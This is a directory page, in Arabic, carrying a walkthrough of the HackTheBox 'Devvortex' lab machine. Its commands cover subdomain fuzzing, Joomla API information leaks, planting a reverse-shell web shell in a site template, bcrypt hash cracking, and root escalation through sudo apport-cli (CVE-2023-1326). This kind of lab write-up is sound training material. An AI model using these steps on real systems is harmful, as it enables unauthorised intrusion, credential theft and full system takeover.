Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DEVVORTEX — جولة HackTheBox Devvortex التي تغطي استكشاف النطاقات الفرعية، وتعداد Joomla API، وقشرة ويب قائمة على القوالب، وكسر تجزئة bcrypt، وتصعيد الصلاحيات عبر Apport-CLI CVE-2023-1326. | Kitploit
أدوات/GitHubGitHub/r3fr4kt/devvortex
كسر كلمات المرورتصعيد الامتيازاتتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتCTFاختبار الاختراقتعداد النطاقات الفرعيةالتعلم والتعليممختبرات وتدريب عملي
GitHub
24منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
r3fr4kt/devvortex

DEVVORTEX

جولة HackTheBox Devvortex التي تغطي استكشاف النطاقات الفرعية، وتعداد Joomla API، وقشرة ويب قائمة على القوالب، وكسر تجزئة bcrypt، وتصعيد الصلاحيات عبر Apport-CLI CVE-2023-1326.

عرض المستودع

DEVVORTEX

HackTheBox: Devvortex — شرح تفصيلي للجهاز

شرح تقني شامل يوثّق عملية اختراق جهاز Devvortex على منصة HackTheBox. يوضح هذا المسار استكشاف النطاقات الفرعية (Subdomain Fuzzing)، وتعداد واجهة Joomla API، وتعديل القوالب (Template Modification) للوصول الأولي، واستخراج وتكسير تجزئات قاعدة البيانات (Database Hash Extraction & Cracking) للتحرك الجانبي، واستغلال Apport-CLI (CVE-2023-1326) لتصعيد الصلاحيات إلى root.


الملخص التنفيذي

  • نظام التشغيل المستهدف: Linux
  • مستوى الصعوبة: سهل
  • النطاق: devvortex.htb
  • النطاق الفرعي: dev.devvortex.htb
  • المفاهيم الأساسية: تعداد النطاقات الفرعية، استغلال Joomla CMS، تسريب المعلومات، تكسير تجزئات Bcrypt، إساءة استخدام Sudo (apport-cli).

1. الاستطلاع والتعداد

فحص المنافذ (Nmap)

تم إجراء اكتشاف سريع لمنافذ TCP عبر جميع المنافذ:

nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

تم تنفيذ فحص لاحق لاكتشاف الخدمات والإصدارات على المنافذ المفتوحة المحددة:

Bash

nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

إعداد ملف المضيفين (Hostfile)

أضف نطاق الهدف الأساسي إلى جدول تحليل أسماء المضيفين المحلي:

Bash

sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

اكتشاف النطاقات الفرعية (FFUF)

استكشاف المضيفين الافتراضيين لتحديد أصول ويب إضافية:

Bash

ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

النتيجة: تم اكتشاف dev.devvortex.htb. تمت إضافة dev.devvortex.htb إلى /etc/hosts.

استكشاف المجلدات (Directory Fuzzing)

تعداد المسارات على المضيف الافتراضي المكتشف حديثًا:

Bash

ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

النتيجة: تم اكتشاف نقطة النهاية /administrator، مما كشف عن بوابة مصادقة إدارية لـ Joomla.

2. الوصول الأولي (Foothold)

تسريب المعلومات عبر Joomla API

استكشاف نقاط النهاية العامة التي تكشف عنها واجهة Joomla REST API لجمع مقاييس التطبيق والمستخدمين الحساسة:

Bash

curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

حقن Web Shell عبر قوالب الموقع

باستخدام بيانات الاعتماد المكتشفة أثناء التعداد، سجّل الدخول إلى بوابة /administrator الخاصة بـ Joomla:

  1. انتقل إلى System > Site Templates.

  2. اختر القالب النشط وافتح error.php.

  3. استبدل محتويات error.php بحمولة PHP reverse shell قياسية.

قم بتهيئة مستمع netcat محلي:

Bash

nc -lvnp 4444

قم بتشغيل تنفيذ error.php عبر طلب صفحة غير موجودة أو الوصول إلى الملف مباشرة.

تثبيت TTY Shell

بمجرد اتصال الـ shell كمستخدم www-data، أنشئ جلسة PTY تفاعلية:

Bash

python3 -c 'import pty; pty.spawn("/bin/bash")'

3. التحرك الجانبي (Logan)

تعداد قاعدة البيانات

ادخل إلى قاعدة بيانات MySQL المحلية باستخدام بيانات الاعتماد المستخرجة من ملفات إعدادات الويب:

Bash

mysql -u lewis -p

استعلم عن جدول المستخدمين لتحديد تجزئات بيانات الاعتماد المخزنة:

SQL

SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

تكسير كلمات المرور دون اتصال

استخرج تجزئة كلمة مرور bcrypt للمستخدم logan إلى ملف محلي:

Bash

nano hash.txt

قم بتكسير التجزئة باستخدام John the Ripper مع rockyou.txt:

Bash

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

المصادقة عبر SSH

أنشئ جلسة SSH دائمة كمستخدم logan باستخدام بيانات الاعتماد المكسورة:

Bash

ssh [email protected]

علم المستخدم (User Flag)

Bash

cat user.txt

4. تصعيد الصلاحيات

تدقيق صلاحيات Sudo

افحص الملفات التنفيذية المسموح بها للمستخدم logan:

Bash

sudo -l

المخرجات: يمكن للمستخدم تشغيل /usr/bin/apport-cli بصلاحيات root.

استغلال Apport-CLI (CVE-2023-1326)

تحقق من الإصدار المثبّت من apport-cli:

Bash

apport-cli --version

افحص /var/crash بحثًا عن ملفات التقارير الموجودة. إذا كانت فارغة، قم بإنشاء ملف انهيار يدويًا:

Bash

echo "ProblemType: Crash" > /var/crash/.crash

قم بتشغيل apport-cli على ملف الانهيار المُنشأ باستخدام sudo:

Bash

sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. اضغط على v لـ View report.

  2. عندما يقوم المُرقّم (less) بتحميل المحتوى، اخرج إلى shell النظام عبر إدخال:

Plaintext

!/bin/bash

5. توحيد النظام

تحقق من رفع الصلاحيات إلى root:

Bash

whoami
# Output: root

علم الروت (Root Flag)

Bash

cat /root/root.txt
تنزيل الأداة